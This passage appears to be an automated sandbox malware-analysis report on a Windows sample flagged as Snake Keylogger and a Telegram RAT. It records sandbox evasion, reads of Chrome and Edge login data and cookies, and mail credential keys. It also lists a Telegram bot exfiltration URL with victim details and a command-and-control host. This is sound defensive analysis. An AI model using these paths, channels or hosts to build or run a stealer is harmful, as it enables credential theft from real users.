Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe TID: 1076	Thread sleep time: -593985s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_0040276E FindFirstFileW,	4_2_0040276E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	4_2_00405770
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Code function: 4_2_0040622B FindFirstFileW,FindClose,	4_2_0040622B

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598243	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000000.00000002.1981393720.000000000049E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.00000000044ED000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004498000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	API call chain: ExitProcess graph end node			graph_0-4500
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	API call chain: ExitProcess graph end node			graph_0-4506

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,

0_2_00401752

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe"

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Code function: 0_2_00405F0A GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 5824, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23885.29286.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 5824, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.23885.29286.exe PID: 5824, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	11 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.FileRepMalware.23885.29286.exe	27%	Virustotal		Browse
SecuriteInfo.com.FileRepMalware.23885.29286.exe	26%	ReversingLabs	Win32.Spyware.Snakekeylogger

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsp361A.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsp361A.tmp\System.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.23.110	true	false	high
drive.usercontent.google.com	142.250.184.193	true	false	high
reallyfreegeoip.org	104.21.64.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2010/02/2025%20/%2018:10:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034AC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/4	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004498000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.office.com/lB	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034ABC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2139529173.0000000004542000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2926114780.0000000004500000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000003.2139469458.0000000004506000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en4	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034A90000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359A7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C4E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035A1C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.FileRepMalware.23885.29286.exe	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359F5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.00000000359A7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035C4E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035A1C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000349B3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.0000000034A90000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2948327631.0000000035B99000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	SecuriteInfo.com.FileRepMalware.23885.29286.exe, 00000004.00000002.2946709290.00000000348D1000.00000004.00000800.00020000.00000000.sdmp	false	high
